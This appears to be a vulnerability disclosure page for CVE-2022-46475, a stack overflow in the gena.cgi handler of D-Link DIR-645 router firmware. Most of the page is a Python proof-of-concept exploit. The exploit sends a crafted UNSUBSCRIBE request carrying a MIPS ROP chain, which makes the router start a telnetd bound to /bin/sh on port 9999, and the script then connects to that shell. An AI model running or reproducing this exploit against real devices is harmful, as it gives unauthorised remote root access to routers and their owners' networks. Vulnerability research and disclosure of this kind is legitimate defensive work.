Headline
CVE-2022-46475: iot/DIR-645 genacgi Stack overflow.md at main · Insight8991/iot
D-Link DIR 645A1 1.06B01_Beta01 was discovered to contain a stack overflow via the service= variable in the genacgi_main function.
D-Link DIR-645 genacgi Stack Overflow
Vender: D-Link
Firmware version: DIR 645A1 1.06B01_Beta01
Exploit Author: Insight
Vendor Homepage: http: //www.dlink.com.cn/
Detailed description
This vulnerability exists in the genacgi_main function in the cgibin program. v28 is the content behind request_uri "service=". When the request is unsubscribe, sprintf formats it on the stack, causing a stack overflow.
POC
# python3 from pwn import * from socket import * from os import * from time import * context(os = 'linux’, arch = ‘mips’)
libc_base = 0x2aaf8000
s = socket(AF_INET, SOCK_STREAM)
cmd = b’telnetd -p 9999 -l /bin/sh;’ payload = b’a’*462 payload += p32(libc_base + 0x53200 - 1) # s0 system_addr - 1 payload += p32(libc_base + 0x169C4) # s1 addiu $s2, $sp, 0x18 (=> jalr $s0) payload += b’a’*4 # fp payload += p32(libc_base + 0x32A98) # ra addiu $s0, 1 (=> jalr $s1) payload += b’a’*0x18 # padding payload += cmd
msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n" msg += b"Host: localhost:49152\r\n" msg += b"SID: 1\r\n\r\n"
s.connect((gethostbyname(“192.168.0.1”), 49152)) s.send(msg)
sleep(1) system(‘telnet 192.168.0.1 9999’)